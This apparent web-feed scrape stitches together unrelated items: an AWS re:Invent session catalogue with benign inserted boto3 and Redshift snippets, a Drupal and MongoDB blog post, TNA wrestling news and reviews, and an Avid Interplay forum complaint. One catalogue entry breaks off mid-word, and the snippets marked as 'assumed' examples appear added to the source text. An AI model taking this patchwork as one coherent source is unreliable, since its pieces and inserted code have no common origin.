          An end-to-end, over-the-top (OTT) video system is built of many interdependent architectural tiers, ranging from content preparation, content delivery, and subscriber and entitlement management, to analytics and recommendations. This talk will provide a detailed exploration of how to architect a media platform that allows for growth, scalability, security, and business changes at each tier, based on real-world experiences delivering over 100 Gbps of concurrent video traffic with 24/7/365 linear TV requirements. Finally, learn how Verizon uses AWS, including Amazon Redshift and Amazon Elastic MapReduce, to power its recently launched mobile video application Go90. Using a mixture of AWS services and native applications, we address the following scaling challenges: content ingest, preparation, and distribution; operation of a 24x7x365 linear OTT playout platform; common pitfalls with transcode and content preparation; multi-DRM and packaging to allow cross-platform playback; efficient delivery and a multi-CDN methodology to allow for a perfect experience globally; Kinesis as a dual-purpose system for both analytics and concurrency access management; integration with machine learning for an adaptive recommendation system, with real-time integration between content history and advertising data; user, entitlement, and content management; and general best practices for cloud architectures and their integration with Amazon Web Services, including infrastructure as code, disposable and immutable infrastructure, code deployment and release management, DevOps, and microservices architectures. This session is great for architects, engineers, and CTOs within media and entertainment, or others simply interested in decoupled architectures.
          ARC302 - Running Lean Architectures: How to Optimize for Cost Efficiency
          Whether you're a cash-strapped startup or an enterprise optimizing spend, it pays to run cost-efficient architectures on AWS. This session reviews a wide range of cost planning, monitoring, and optimization strategies, featuring real-world experience from AWS customers. We'll cover how you can effectively combine EC2 On-Demand, Reserved, and Spot instances to handle different use cases, leveraging auto scaling to match capacity to workload, choosing the optimal instance type through load testing, taking advantage of multi-AZ support, and using CloudWatch to monitor usage and automatically shut off resources when not in use. We'll discuss taking advantage of tiered storage and caching, offloading content to Amazon CloudFront to reduce back-end load, and getting rid of your back end entirely, by leveraging AWS high-level services. We will also showcase simple tools to help track and manage costs, including the AWS Cost Explorer, Billing Alerts, and Trusted Advisor. This session will be your pocket guide for running cost effectively in the Amazon cloud.
          ARC301 - Scaling Up to Your First 10 Million Users
          Cloud computing gives you a number of advantages, such as the ability to scale your web application or website on demand. If you have a new web application and want to use cloud computing, you might be asking yourself, "Where do I start?" Join us in this session to understand best practices for scaling your resources from zero to millions of users. We show you how to best combine different AWS services, how to make smarter decisions for architecting your application, and how to scale your infrastructure in the cloud.
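          One recurring step in this kind of scaling story is letting an Auto Scaling group add capacity automatically instead of sizing fleets by hand. The sketch below is an assumed example of a scale-out policy on an existing group; the group name, adjustment, and cooldown are illustrative, and a CloudWatch alarm would normally trigger the policy.

          import boto3

          autoscaling = boto3.client("autoscaling")

          # Add two instances whenever this policy is invoked (for example by a
          # CloudWatch alarm on average CPU). Names and sizes are placeholders.
          response = autoscaling.put_scaling_policy(
              AutoScalingGroupName="web-asg",
              PolicyName="scale-out-on-load",
              AdjustmentType="ChangeInCapacity",
              ScalingAdjustment=2,
              Cooldown=300,
          )
          print(response["PolicyARN"])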
          ARC201 - Microservices Architecture for Digital Platforms with AWS Lambda, Amazon CloudFront and Amazon DynamoDB
          Digital platforms are by nature resource intensive, expensive to build, and difficult to manage at scale. What if we can change this perception and help AWS customers architect a digital platform that is low cost and low maintenance? This session describes the underlying architecture behind dam.deep.mg, the Digital Asset Management system built by Mitoc Group and powered by AWS abstracted services like AWS Lambda, Amazon CloudFront, and Amazon DynamoDB. Eugene Istrati, the CTO of Mitoc Group, will dive deep into their approach to microservices architecture on serverless environments and demonstrate how anyone can architect AWS abstracted services to achieve high scalability, high availability, and high performance without huge effort or expensive resource allocation.
          WRK304 - Build a Recommendation Engine and Use Amazon Machine Learning in Real Time
          Build an exciting machine learning model for recommending top restaurants for a customer in real time based on past orders and viewing history. In this guided session, you will get hands-on with data cleansing, building an Amazon Machine Learning model, and making real-time predictions. A dataset will be provided. Prerequisites: Participants should have an AWS account established and available for use during the workshop.  Participants should bring their own laptop.    Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only.
          WRK303 - Real-World Data Warehousing with Amazon Redshift and Big Data Solutions from AWS Marketplace
          In this workshop, you will work with other attendees as a small team to build an end-to-end data warehouse using Amazon Redshift and by leveraging key AWS Marketplace partners. Your team will learn how to build a data pipeline using an ETL partner from the AWS Marketplace, to perform common validation and aggregation tasks in a data ingestion pipeline.  Your team will then learn how to build dashboards and reports using a data visualization partner from AWS Marketplace, for interactive analysis of large datasets in Amazon Redshift. In less than 2 hours your team will build a fully functional solution to discover meaningful insights from raw datasets. The session also shows how you can extend this solution further to create a near real-time solution by leveraging Amazon Kinesis and other AWS Big Data services. Prerequisites: Hands-on experience with AWS. Some prior experience with databases, SQL, and familiarity with data-warehousing concepts. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only.
          WRK301 - Implementing Twitter Analytics Using Spark Streaming, Scala, and Amazon EMR
          Over the course of this workshop, we will launch a Spark cluster and deploy a Spark streaming application written in Scala that analyzes popular tags flowing out of Twitter.  Along the way we will learn about Amazon EMR, Spark, Spark Streaming, Scala, and how to deploy applications into Spark clusters on Amazon EMR. Prerequisites: Participants are expected to be familiar with building modest-size applications in Scala. Participants should have an AWS account established and available for use during the workshop.  Please bring your laptop. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only.
          BDT404 - Building and Managing Large-Scale ETL Data Flows with AWS Data Pipeline and Dataduct
          As data volumes grow, managing and scaling data pipelines for ETL and batch processing can be daunting. With more than 13.5 million learners worldwide, hundreds of courses, and thousands of instructors, Coursera manages over a hundred data pipelines for ETL, batch processing, and new product development. In this session, we dive deep into AWS Data Pipeline and Dataduct, an open source framework built at Coursera to manage pipelines and create reusable patterns to expedite developer productivity. We share the lessons learned during our journey: from basic ETL processes, such as loading data from Amazon RDS to Amazon Redshift, to more sophisticated pipelines to power recommendation engines and search services. Attendees learn: do's and don'ts of Data Pipeline; using Dataduct to streamline your data pipelines; how to use Data Pipeline to power other data products, such as recommendation systems; and what's next for Dataduct.
          BDT403 - Best Practices for Building Real-time Streaming Applications with Amazon Kinesis
          Amazon Kinesis is a fully managed, cloud-based service for real-time data processing over large, distributed data streams. Customers who use Amazon Kinesis can continuously capture and process real-time data such as website clickstreams, financial transactions, social media feeds, IT logs, location-tracking events, and more. In this session, we first focus on building a scalable, durable streaming data ingest workflow, from data producers like mobile devices, servers, or even a web browser, using the right tool for the right job. Then, we cover code design that minimizes duplicates and achieves exactly-once processing semantics in your elastic stream-processing application, built with the Kinesis Client Library. Attend this session to learn best practices for building a real-time streaming data architecture with Amazon Kinesis, and get answers to technical questions frequently asked by those starting to process streaming events.
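          The "exactly-once" discussion usually reduces to idempotent processing on the consumer side. One common approach, sketched here as an assumption rather than the session's own code, is to record each Kinesis sequence number with a conditional write to DynamoDB and skip records that have already been seen.

          import boto3
          from botocore.exceptions import ClientError

          table = boto3.resource("dynamodb").Table("processed-records")   # assumed table

          def process_once(record):
              try:
                  # Succeeds only the first time this sequence number is seen.
                  table.put_item(
                      Item={"sequenceNumber": record["sequenceNumber"]},
                      ConditionExpression="attribute_not_exists(sequenceNumber)",
                  )
              except ClientError as error:
                  if error.response["Error"]["Code"] == "ConditionalCheckFailedException":
                      return  # duplicate delivery; already handled
                  raise
              handle(record)

          def handle(record):
              print("processing", record["sequenceNumber"])   # stand-in for real business logic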
          BDT402 - Delivering Business Agility Using AWS
          Wipro is one of India's largest publicly traded companies and the seventh largest IT services firm in the world. In this session, we showcase the structured methods that Wipro has used in enabling enterprises to take advantage of the cloud. These cover identifying workloads and application profiles that could benefit, re-structuring enterprise application and infrastructure components for migration, rapid and thorough verification and validation, and modifying component monitoring and management. Several of these methods can be tailored to the individual client or functional context, so specific client examples are presented. We also discuss the enterprise experience of enabling many non-IT functions to benefit from the cloud, such as sales and training. Bringing more functions into the cloud increases the benefit drawn from a cloud-enabled IT landscape. Session sponsored by Wipro.
          BDT401 - Amazon Redshift Deep Dive: Tuning and Best Practices
          Get a look under the covers: Learn tuning best practices for taking advantage of Amazon Redshift's columnar technology and parallel processing capabilities to improve your delivery of queries and improve overall database performance. This session explains how to migrate from existing data warehouses, create an optimized schema, efficiently load data, use workload management, tune your queries, and use Amazon Redshift's interleaved sorting features. Finally, learn how TripAdvisor uses these best practices to give their entire organization access to analytic insights at scale.
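          Two of the tuning levers mentioned here, distribution/sort keys and loading via COPY from Amazon S3, look roughly like the statements below. This is an assumed sketch: the table layout, bucket, and IAM role are placeholders, and the statements would be executed through any PostgreSQL-compatible driver connected to the cluster.

          CREATE_TABLE = """
          CREATE TABLE page_views (
              user_id   BIGINT,
              viewed_at TIMESTAMP,
              url       VARCHAR(2048)
          )
          DISTKEY (user_id)
          SORTKEY (viewed_at);
          """

          COPY_FROM_S3 = """
          COPY page_views
          FROM 's3://example-bucket/page_views/'
          IAM_ROLE 'arn:aws:iam::123456789012:role/RedshiftCopyRole'
          CSV GZIP;
          """

          # Print the statements; a real job would run them with a Postgres driver.
          print(CREATE_TABLE)
          print(COPY_FROM_S3)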
          BDT324 - Big Data Optimized for the AWS Cloud
          Apache Hadoop is now a foundational platform for big data processing and discovery that drives next-generation analytics. While Hadoop was designed when cloud models were in their infancy, the open source platform works remarkably well in production environments in the cloud. This talk will cover use cases for running big data in the cloud and share examples of organizations that have experienced real-world success on AWS. We will also look at new software and hardware innovations that are helping companies get more value from their data. Session sponsored by Intel.
          BDT323 - Amazon EBS and Cassandra: 1 Million Writes Per Second on 60 Nodes
          With the introduction of Amazon Elastic Block Store (EBS) GP2 and recent stability improvements, EBS has gained credibility in the Cassandra world for high performance workloads. By running Cassandra on Amazon EBS, you can run denser, cheaper Cassandra clusters with just as much availability as ephemeral storage instances. This talk walks through a highly detailed use case and configuration guide for a multi-petabyte, million-writes-per-second cluster that needs to be high performing and cost efficient. We explore the instance type choices, configuration, and low-level tuning that allowed us to hit 1.3 million writes per second with a replication factor of 3 on just 60 nodes.
          BDT322 - How Redfin and Twitter Leverage Amazon S3 to Build Their Big Data Platforms
          Analyzing large data sets requires significant compute and storage capacity that can vary in size based on the amount of input data and the analysis required. This characteristic of big data workloads is ideally suited to the pay-as-you-go cloud model, where applications can easily scale up and down based on demand. Learn how Amazon S3 can help scale your big data platform. Hear from Redfin and Twitter about how they build their big data platforms on AWS and how they use S3 as an integral piece of their big data platforms.
          BDT320 - NEW LAUNCH! Streaming Data Flows with Amazon Kinesis Firehose and Amazon Kinesis Analytics
          Amazon Kinesis Firehose is a fully-managed, elastic service to deliver real-time data streams to Amazon S3, Amazon Redshift, and other destinations. In this session, we start with overviews of Amazon Kinesis Firehose and Amazon Kinesis Analytics. We then discuss how Amazon Kinesis Firehose makes it even easier to get started with streaming data, without writing a stream processing application or provisioning a single resource. You learn about the key features of Amazon Kinesis Firehose, including its companion agent that makes emitting data from data producers even easier. We walk through capture and delivery with an end-to-end demo, and discuss key metrics that will help developers and architects understand their streaming data flow. Finally, we look at some patterns for data consumption as the data streams into S3. We show two examples: using AWS Lambda, and how you can use Apache Spark running within Amazon EMR to query data directly in Amazon S3 through EMRFS.
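          For orientation, emitting a record into a Firehose delivery stream from a producer is a single API call; the sketch below is an assumed example with a placeholder stream name and payload, after which Firehose batches and delivers to the configured destination such as Amazon S3.

          import json
          import boto3

          firehose = boto3.client("firehose")

          event = {"page": "/checkout", "latency_ms": 182}
          firehose.put_record(
              DeliveryStreamName="clickstream-to-s3",               # placeholder stream
              Record={"Data": (json.dumps(event) + "\n").encode("utf-8")},
          )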
          BDT319 - NEW LAUNCH! Amazon QuickSight: Very Fast, Easy-to-Use, Cloud-native Business Intelligence
          Amazon QuickSight is a very fast, cloud-powered business intelligence (BI) service that makes it easy to build visualizations, perform ad-hoc analysis, and quickly get business insights from your data. In this session, we demonstrate how you can point Amazon QuickSight to AWS data stores, flat files, or other third-party data sources and begin visualizing your data in minutes. We also introduce SPICE -  a new Super-fast, Parallel, In-memory, Calculation Engine in Amazon QuickSight, which performs advanced calculations and render visualizations rapidly without requiring any additional infrastructure, SQL programming, or dimensional modeling, so you can seamlessly scale to hundreds of thousands of users and petabytes of data. Lastly, you will see how Amazon QuickSight provides you with smart visualizations and graphs that are optimized for your different data types, to ensure the most suitable and appropriate visualization to conduct your analysis, and how to share these visualization stories using the built-in collaboration tools. View Less
          BDT318 - Netflix Keystone: How Netflix Handles Data Streams Up to 8 Million Events Per Second
          In this session, Netflix provides an overview of Keystone, their new data pipeline. The session covers how Netflix migrated from Suro to Keystone, including the reasons behind the transition and the challenges of zero loss while processing over 400 billion events daily. The session covers in detail how they deploy, operate, and scale Kafka, Samza, Docker, and Apache Mesos in AWS to manage 8 million events & 17 GB per second during peak.
          BDT317 - Building a Data Lake on AWS
          Conceptually, a data lake is a flat data store to collect data in its original form, without the need to enforce a predefined schema. Instead, new schemas or views are created "on demand", providing a far more agile and flexible architecture while enabling new types of analytical insights. AWS provides many of the building blocks required to help organizations implement a data lake. In this session, we introduce key concepts for a data lake and present aspects related to its implementation. We discuss critical success factors and pitfalls to avoid, as well as operational aspects such as security, governance, search, indexing, and metadata management. We also provide insight on how AWS enables a data lake architecture. Attendees get practical tips and recommendations to get started with their data lake implementations on AWS.
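          A minimal sketch of the "collect data in its original form" idea, under assumed names: land each raw batch in Amazon S3 beneath a partitioned key layout that downstream engines such as Amazon EMR can prune when querying. The bucket, key layout, and record format are illustrative placeholders.

          import datetime
          import json
          import boto3

          s3 = boto3.client("s3")

          def land_raw_batch(records, source):
              # Partition raw data by source and date so later jobs can scan selectively.
              now = datetime.datetime.utcnow()
              key = "raw/source={}/year={}/month={:02d}/day={:02d}/batch-{}.json".format(
                  source, now.year, now.month, now.day, now.strftime("%H%M%S")
              )
              s3.put_object(
                  Bucket="example-data-lake",                       # placeholder bucket
                  Key=key,
                  Body="\n".join(json.dumps(r) for r in records).encode("utf-8"),
              )
              return key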
          BDT316 - Offloading ETL to Amazon Elastic MapReduce
Amgen discovers, develops, manufactures, and delivers innovative human therapeutics, helping millions of people in the fight against serious illnesses. In 2014, Amgen implemented a solution to offload ETL data across a diverse data set (U.S. pharmaceutical prescriptions and claims) using Amazon EMR. The solution has transformed the way Amgen delivers insights and reports to its sales force. To support Amgen's entry into a much larger market, the ETL process had to scale to eight times its existing data volume. We used Amazon EC2, Amazon S3, Amazon EMR, and Amazon Redshift to generate weekly sales reporting metrics. This session discusses highlights in Amgen's journey to leverage big data technologies and lay the foundation for future growth: benefits of ETL offloading in Amazon EMR as an entry point for big data technologies; benefits and challenges of using Amazon EMR vs. expanding on-premises ETL and reporting technologies; and how to architect an ETL offload solution using Amazon S3, Amazon EMR, and Impala.
          BDT314 - Running a Big Data and Analytics Application on Amazon EMR and Amazon Redshift with a Focus on Security
No matter the industry, leading organizations need to closely integrate, deploy, secure, and scale diverse technologies to support workloads while containing costs. Nasdaq, Inc., a leading provider of trading, clearing, and exchange technology, is no exception. After migrating more than 1,100 tables from a legacy data warehouse into Amazon Redshift, Nasdaq, Inc. is now implementing a fully integrated, big data architecture that also includes Amazon S3, Amazon EMR, and Presto to securely analyze large historical data sets in a highly regulated environment. Drawing from this experience, Nasdaq, Inc. shares lessons learned and best practices for deploying a highly secure, unified, big data architecture on AWS. Attendees learn: architectural recommendations to extend an Amazon Redshift data warehouse with Amazon EMR and Presto; tips to migrate historical data from an on-premises solution and Amazon Redshift to Amazon S3, making it consumable; and best practices for securing critical data and applications leveraging encryption, SELinux, and VPC.
          BDT313 - Amazon DynamoDB for Big Data
NoSQL is an important part of many big data strategies. Attend this session to learn how Amazon DynamoDB helps you create fast ingest and response data sets. We demonstrate how to use DynamoDB for batch-based query processing and ETL operations (using a SQL-like language) through integration with Amazon EMR and Hive. Then, we show you how to reduce costs and achieve scalability by connecting data to Amazon ElastiCache for handling massive read volumes. We'll also discuss how to add indexes on DynamoDB data for free-text searching by integrating with Elasticsearch using AWS Lambda and DynamoDB streams. Finally, you'll find out how you can take your high-velocity, high-volume data (such as IoT data) in DynamoDB and connect it to a data warehouse (Amazon Redshift) to enable BI analysis.
          BDT312 - Application Monitoring in a Post-Server World: Why Data Context Is Critical
The move towards microservices in Docker, EC2, and Lambda points to a shift towards shorter-lived resources. These new application architectures drive new agility and efficiency but, while providing developers with inherent scalability, elasticity, and flexibility, also present new challenges for application monitoring. The days of static server monitoring with a single health and status check are over. These days you need to know how your entire ecosystem of AWS EC2 instances is performing, especially since many of them are short-lived and may only exist for a few minutes. With such ephemeral resources, there is no server to monitor; you need to understand performance along the lines of computation intent. And for this, you need the context in which these resources are performing. Join Kevin McGuire, Director of Engineering at New Relic, as he discusses trends in computing that we've gleaned from monitoring Docker and how they'v
                    Using MongoDB With Drupal        
          David Csonka Fri, 02/03/2017 - 04:04

Because of the database abstraction layer that was added in Drupal 7, it is fairly convenient to use a variety of database servers for the backend of your Drupal software. While the term "database abstraction layer" does sound rather sophisticated, and the code involved is certainly not insignificant, in layman's terms what this system does is let a Drupal developer and Drupal modules work with the site's database without generally having to be concerned with which type of database it is.
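
As a purely illustrative sketch (not from the original article), here is what database access through Drupal 7's API typically looks like; the same calls run unchanged whether the configured backend is MySQL, PostgreSQL, or SQLite:

<?php
// Drupal 7 database API: the {node} braces and the named placeholder let the
// abstraction layer rewrite the query for whichever driver is configured.
$title = db_query(
  'SELECT title FROM {node} WHERE nid = :nid',
  array(':nid' => 1)
)->fetchField();

// The dynamic query builder avoids hand-written SQL entirely.
$recent = db_select('node', 'n')
  ->fields('n', array('nid', 'title'))
  ->condition('n.status', 1)
  ->orderBy('n.created', 'DESC')
  ->range(0, 5)
  ->execute()
  ->fetchAllKeyed();
?>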

Generally speaking though, this works very well with relational databases, such as MySQL. These types of databases are composed of various tables connected by key relationships. The relational model is a very successful one and has been studied and improved for decades now. Schemas and relational integrity are important features of this model that make it useful for content management systems.

There are other types of database models though, most having been around just as long. NoSQL is a popular classification often used to refer to non-relational database types, and MongoDB, a somewhat newer database system built around document collections, fits into this category.

Rather than storing data in tables with rows and columns, MongoDB keeps it in documents that have a JSON-like format. These documents also aren't bound by a strict universal schema, so your data can easily change over time without requiring retroactive edits to older documents. Some of the key qualities that have attracted users to MongoDB are its built-in performance-enhancing features, such as high availability with replica sets and load balancing with horizontal sharding.
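
To make that concrete with a sketch that is not from the original article: in PHP terms a MongoDB document is essentially an associative array, and two documents in the same collection are free to carry different fields, with no "ALTER TABLE" step in between.

<?php
// Two documents that could sit side by side in the same "articles" collection.
$article_v1 = array(
  'title'  => 'Using MongoDB With Drupal',
  'author' => 'David Csonka',
  'tags'   => array('mongodb', 'drupal'),
);

// A later document adds fields the first never had; no schema change is required.
$article_v2 = array(
  'title'     => 'Read-heavy content sites',
  'author'    => 'David Csonka',
  'tags'      => array('mongodb'),
  'summary'   => 'Notes on scaling reads with replica sets.',
  'published' => true,
);
?>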

          That is quite obviously a very cursory review of the technical aspects of MongoDB, but you can read in more detail about it on their main website.

          While document-based databases are not new, the release of MongoDB several years ago created quite a stir and made developers very interested in finding uses for it in their applications, usually to take advantage of its vaunted performance qualities.

          Can you use MongoDB with Drupal?

The short answer is "yes", sort of. Drupal 7 saw the release of the MongoDB module. An important thing to realize, though, is that this integration does not allow you to switch completely to MongoDB as the database for your Drupal installation. Despite the utility of the Drupal database API we previously mentioned, there are still aspects of how a content management system like Drupal works that don't lend themselves well to the document storage nature of MongoDB. For Drupal 7, a significant number of Drupal's components can still be stored in MongoDB, and for Drupal 8 possibly even more, once the work on the module is completed.

          See the table on the module project page to review which Drupal features can be converted to use MongoDB.
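
For orientation only, and with the caveat that the exact key names should be checked against the module's own README, wiring the Drupal 7 MongoDB module up in settings.php looks roughly like the sketch below; the host and database name here are assumptions for illustration.

<?php
// settings.php (Drupal 7) -- illustrative sketch only; verify the key names
// against the MongoDB module documentation before relying on them.
$conf['mongodb_connections'] = array(
  'default' => array(
    'host' => 'mongodb://localhost:27017', // assumed local MongoDB instance
    'db'   => 'drupal',                    // assumed database name
  ),
);
// The individual sub-modules (cache, watchdog, field storage, and so on) are
// then enabled and pointed at this connection; the project page table mentioned
// above lists which pieces of Drupal can actually be moved over.
?>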

So, will you see performance boosts on your Drupal website just by integrating MongoDB to store various components, like entities or blocks? It is possible to gain a small performance increase, but this is not guaranteed and almost assuredly depends on the nature of your website and its content.

A document storage database like MongoDB is much better suited to serving lots of "reads" very quickly, and it scales out to multiple servers very easily. So, if you have a large website that serves an enormous amount of content to be read (and not updated) by users, it might be advantageous to use a solution like MongoDB.

However, if you have a lot of interactive content with frequent editing and updating, that is, writes to the database, then MongoDB may not offer any improvement and may actually cause problems with data duplication if not properly managed.

          The important thing to realize here is that many popular technologies are not automatically a good solution simply because they are being talked about and used by well-known tech luminaries. Most tools have a use-case that matches their features, and MongoDB is no different. Be sure to learn more about this database system before determining if it will be a useful addition to your project.


                    News: Another round of shock TNA releases        

          Over the course of the past several days, TNA Wrestling have continued their company restructuring and released several notable talents.

Tara, a five-time Knockouts Champion and one-time Knockouts Tag Team Champion, was released from her contract yesterday, 16th July 2013. After a hiatus from TNA programming over the past several months, Tara reappeared two weeks ago managing Jessie Godderz and Robbie E. Her final singles match was a losing effort against ODB on a recent episode of Xplosion.

          Drew Hankinson aka D.O.C., a long-time member of the Aces & Eights faction, revealed yesterday that TNA had allowed his contract to expire on 12th July 2013, with no intention of renewal. Hankinson was one of the first members of the heel faction to be revealed and had anchored the group for over a year. On a recent episode of Impact Wrestling, there appeared to be dissension among the group, as Hankinson refused to eliminate himself from a Battle Royal to determine which member of Aces & Eights took a spot in the Bound for Glory Series.

Bruce Prichard, the Head of Programming and Talent Relations, was among those asked to restructure their deal in the wake of company changes. However, rather than accept the new deal, Prichard declined and is believed to be on his way out. Prichard had also long been a member of the Gut Check Challenge judging panel, often offering the most unpopular decision of the three.

          Clem's Take - These roster cuts are beginning to look like a massacre. TNA have basically eliminated their entire undercard with these wholesale changes and compromised several angles/divisions in the process.

          Tara, while I'm sure Jessie can manage coming down to the ring on his own from now on, was a vital piece of the Knockout puzzle for the longest time. The recent 'State of the Knockouts' segment on Impact revealed the severely depleted roster, made up entirely of Mickie, Velvet, Taryn and Gail. Only four women wrestling and they choose to release a touchstone of the division? However, I do expect to see her back sooner or later. It wasn't that long ago that Tara was released the last time, only to reappear as Madison Rayne's mysterious biker bodyguard.

          Hankinson is another cut that genuinely takes me by surprise. Not because he's that big a part of TNA programming, but simply because of his affiliation with Aces & Eights. The faction are in a heated feud with the resurrected Main Event Mafia and this is the worst possible time to be seen losing a member. At the very least, they should've played up his arguments with Mr Anderson for several weeks, before finally ejecting him from the group. Frankly, if TNA are looking at members of Aces & Eights to release, Wes Brisco, Garret Bischoff and Mike Knox would've appeared on my radar well before Hankinson.

          Prichard is probably the biggest surprise in the bunch, even if he is the least well-known as an on-air personality. Being such an important member of TNA upper management, losing that cog in the machine could cost the company in the short term while they scramble to replace him. However, this wasn't so much a case of him being pushed, as him jumping. The new deal wasn't to his liking and he's going elsewhere as a result. Being his choice, that puts him ahead of every other talent released in the past few weeks!
                    News: TNA Knockouts Tag Team Championships officially retired        

          The roster page on Impact Wrestling's website appears to indicate the Knockouts Tag Team Championships have finally been retired.

          The titles had been long inactive, having been won by the inter-gender tag team of Eric Young and ODB on February 28th, 2012 and defended sporadically.

          Several weeks ago, on an episode of Impact Wrestling, the Knockouts General Manager Brooke Hogan vacated the titles, due to Young's being a man. It seems as though this will be the last we hear of them.

          Clem's Take: I'm hardly surprised by the move and could've seen it happen sooner. The Knockouts division simply doesn't have enough depth to sustain a tag team division. Hell, they barely have enough depth to sustain a singles division anymore. For whatever reason, TNA have let the division fall into disarray and besides feuds for the title, don't bother to fly in more than four women at a time.
                    Trash Talking: State of the Knockouts         
          written by Rob Poulloin

On the previous episode of Impact Wrestling (20/06), Knockouts official Brooke Hogan addressed the current state of the division. She praised and hyped the division, but somehow failed to notice that, by the end of the segment, there were only four wrestlers in the ring.

The Knockouts suffer similarly to the Tag Team and X Divisions and are often considered an afterthought to the main event scene, and with all focus on the BFG Series it is unlikely much else will get a look-in this summer. The segment was placed to highlight the division, especially on the back of the well-received match at Slammiversary between Gail Kim and Taryn Terrell, and to hype what will be on offer this summer. But beyond those two being booked in a Ladder Match to continue their feud, and Velvet Sky getting her rematch for the title against Mickie James, the division looks light on the ground, missing a number of names such as Brooke Tessmacher, Tara (who announced that she would be off Impact for a few months) and the pregnant Madison Rayne.

Champion Mickie James has a lack of competition (image by Impact Wrestling).
The segment started off with six wrestlers in the ring, but these included Knockouts Tag Team Champions and current referee ODB and her husband Eric Young, who haven't defended the belts in over a year. Thankfully they vacated the belts, with EY admitting he isn't a woman, and hopefully these belts won't be seen again until the division has enough competitors to make it worthwhile having them around.

With the lack of wrestlers around, it surprised me that TNA didn't make an effort to put Gut Check contestant Taeler Hendrix in the ring, especially as she had a match a few weeks ago and would provide a much-needed opponent once we have seen the announced rematches and the inevitable tag team match pitting the heels against the faces.

Besides announcing two future matches, this segment didn't really add much to the show and could easily have taken place backstage and been shorter. Without Mickie James' entertaining new heel role this segment would have fallen flat on its face; Brooke Hogan stumbled through her lines, whilst Terrell blended into the background and her win over Gail Kim was overlooked completely. If TNA want the Knockouts to excite through the summer, then more effort and more bodies are going to be needed than this showing.
           

                    Review: Impact Wrestling 13/06/2013 Hour 2        

Opening the second hour of this week's Impact Wrestling was another BFG Series qualifying match, Austin Aries vs Eric Young. Naturally, Young's chances of beating 'The Greatest Man That Ever Lived' were slim to none, but all credit to him, he knows how to entertain a crowd. Both he and 'wife' ODB are infinitely entertaining. I particularly enjoyed the spot where, after Aries had spun around on Young's back, ODB entered the ring and allowed Young to spin around on hers. They're a quality double act and it's a shame Young has to spend so long away from TNA shooting his nature show. This was exemplified by the video package bringing to attention that the pair are still the Knockouts Tag Team Champions and have failed to defend their titles in over six months! Austin Aries was his usual cocky self, dominating proceedings and even getting a healthy crowd response. I did worry slightly, however, as Aries looked even more pissed off than usual. This is a star who easily grows disenchanted with the wrestling business and I fear he's still reeling from the Christy Hemme incident last month. I trust TNA appreciate what a world-class athlete they have in Aries and that he's treated well in the coming months. Suffice to say, his entrance into the BFG Series bodes well, as he nailed Eric Young with a devastating Brainbuster and moved into the tournament with ease.


          Next up was the Aces & Eights' Battle Royal. Set up by Hogan at the top of the show, designed to divide the group, it almost did just that. Mr Anderson, being the new VP of the group, was clearly their pick for winner and entry into the BFG Series. Most members had no problem with this, being eliminated from the match in a variety of silly ways. He finger-banged Brisco (that just sounds wrong), spun Bischoff around in an exaggerated manner, had Knox backing away in fear and "convinced" Devon to get the tables. I'm not usually a fan of Aces & Eights, but this segment was pretty funny. The only fly in the ointment was when Anderson attempted to "magically" throw Doc over the top rope and the big man merely looked at him in disgust. After a few more tries, Anderson grew weary of Doc's defiance and the former Luke Gallows exploded on the Asshole. That had to have been the defining segment of Doc's career and the biggest face pop he'll ever likely receive. He looked good rebelling against his brothers, perhaps planting the seeds for something more down the line. Unfortunately, Anderson dumped his ass out of the ring and achieved the desired result regardless.


To close the show, we had another amazing installment of AJ Styles vs Kurt Angle. What's left to be said about these two top-tier talents and their combined magnificence? A few months ago, Angle even admitted Styles was the reason he came to TNA in the first place (Samoa Joe must be hanging his head in shame and walking away like Charlie Brown right now). We've seen this match a thousand times now and yet somehow they still find ways to make it different and entertaining. Hell, they only just worked Slammiversary together, giving yet another possible Match of the Year candidate. Where a TV main event would usually get the short end of the stick, seeing far less innovation than its PPV counterpart, I don't think either man is capable of giving it less than their all. AJ's new tweener character was nicely reinforced with several terrifying moves to Angle, namely his new Calf Killer submission and a nasty-looking snap DDT into the corner. Eventually, AJ won the match by taking advantage of a distraction from Aces & Eights to roll Angle up from behind, but at this point it didn't matter who won; we'd already been thoroughly entertained and there will always be another encounter for the loser to gain his heat back.


          However, rather than ending on Styles' celebration, the Phenomenal One was quick to hightail it out of there, leaving Angle to take the brunt of Aces & Eights' fury alone. But the Olympic Gold Medalist wasn't alone for long, as TNA's latest acquisition, Rampage Jackson, ran down to the ring and chased off the Sons of Anarchy wannabes with his chain (which you'll never actually see connect with anyone, despite swinging it here, there and everywhere ala Abyss' Janice). This nicely played into the pair's confrontation from last week and hyped their eventual match together. Not that it's going to be any time soon, mind you. Rampage still has months of work to be done down in developmental at OVW before he can even think about getting in the ring with the best worker of our time. In hindsight, it's a little strange to devote two weeks of shows to building to a match that won't happen for the foreseeable future, but I suppose if the opposition can book their main events a year in advance, anything is possible in this business. Fingers crossed the MMA star will be ready for something by Bound for Glory in October.

          8 out of 10

A show that started off poorly, but slowly rebuilt our trust over the course of an hour and amazed us with its second.
                    MongoDB media indexer(s) bug(s).        

          Help!

Ever since Avid decided the classic media indexer database needed to be replaced by a MongoDB database, with the media indexer now running two databases, we are seeing all kinds of relinking weirdness in Interplay systems when dynamic relink is enabled. With the 7.3.1 version this has now reached the point where the system is no longer workable: wrong format errors, consistency check failures, and MC presenting AAFs with wrong SourceIDs, causing transcode servers and MC consolidations to crash or use the wrong media. Only the daily 01:00 full re-index of all workspaces by the media indexer seems to bring most issues back in line.

I have tried to address these issues with support, but it's a slow process with mixed results. (The quality of support is not the subject of this thread.)

          I'm starting to wonder if the windows system locale on the editors, which on the systems here needs to be Greek for the use of Greek titles, is playing a role. I hope some Interplay users reading this, or L3 support/engineering can join this thread.

But the whole thing starts with a piece of functionality inside MC that I believe can't be right, even though in a perfect world it shouldn't matter. If you enable dynamic relink and consolidate a sequence, you will see that the new sequence links to the new media. But if you then load the old sequence, you will see that it now also links to the new media. If you disable dynamic relink this of course doesn't happen. But this even affects the original master clip, which will now be segmented between the old and new clips, and disabling dynamic relink does not restore the situation for that media. Closing and reopening bins and clearing bin memory sometimes affects the behavior, but most of the time MC needs to be restarted for some cached info to be 'forgotten'.

           

